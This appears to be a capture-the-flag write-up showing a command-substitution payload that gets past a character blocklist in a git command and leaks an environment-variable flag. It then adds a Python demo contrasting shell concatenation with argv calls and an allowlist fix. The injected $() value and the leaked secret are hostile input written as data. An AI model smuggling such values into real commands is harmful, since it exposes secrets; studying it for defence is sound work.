Some characters are banned, but command substitution with $() still gets through, so a command can still be injected.

INPUT:
main $(echo "$FLAG")

OUTPUT:
fatal: ambiguous argument 'offsec{g1t_p33k_cmd_sub_8Skb0N4P7k3hgSpr}': unknown revision or path not in the working tree.
Use '--' to separate paths from revisions, like this:
'git [...] -- [...]'
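Why the character ban fails and what closes the hole, as an added example (not the challenge's code, which the note does not show). Assumptions: the banned set, the `git log -1` subcommand, the `printf`/Python stand-ins used in place of git, and the constructed FLAG value.

```python
import os
import re
import subprocess
import sys

# Assumption: the note does not list the banned characters; this set is illustrative.
BANNED = set(";|&`<>\n")
# The INPUT line from the note.
PAYLOAD = 'main $(echo "$FLAG")'
# Constructed environment with a stand-in secret.
DEMO_ENV = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"), "FLAG": "constructed-secret"}
# Allowlist: a revision must start alphanumeric, so it can never be read as an option.
SAFE_REV = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,99}")


def blocklist_allows(rev):
    """Weak check: reject only when a banned character is present."""
    return not (set(rev) & BANNED)


def via_shell(rev):
    """Vulnerable pattern: input concatenated into a shell command line.
    printf stands in for git so this runs without a repository."""
    cmd = "printf '%s\\n' " + rev
    return subprocess.run(cmd, shell=True, env=DEMO_ENV,
                          capture_output=True, text=True).stdout


def via_argv(rev):
    """Argument-vector call: no shell parses the input, so $() stays literal.
    A Python one-liner stands in for git and prints its single argument."""
    argv = [sys.executable, "-c", "import sys; print(sys.argv[1])", rev]
    return subprocess.run(argv, env=DEMO_ENV, capture_output=True, text=True).stdout


def safe_git_argv(rev):
    """Hardened form: allowlist the revision, then build argv for subprocess.run()."""
    if not SAFE_REV.fullmatch(rev) or ".." in rev:
        raise ValueError("invalid revision name")
    # --end-of-options (Git 2.24+) stops option parsing; the trailing -- ends the revisions.
    return ["git", "log", "-1", "--end-of-options", rev, "--"]


if __name__ == "__main__":
    print(blocklist_allows(PAYLOAD))    # the blocklist accepts the payload
    print(via_shell(PAYLOAD), end="")   # the shell expands $(...)
    print(via_argv(PAYLOAD), end="")    # the same string stays literal
    print(safe_git_argv("main"))
```

The fix does not depend on extending the banned set: once the revision is validated against an allowlist and passed as one argv element, no shell ever interprets it.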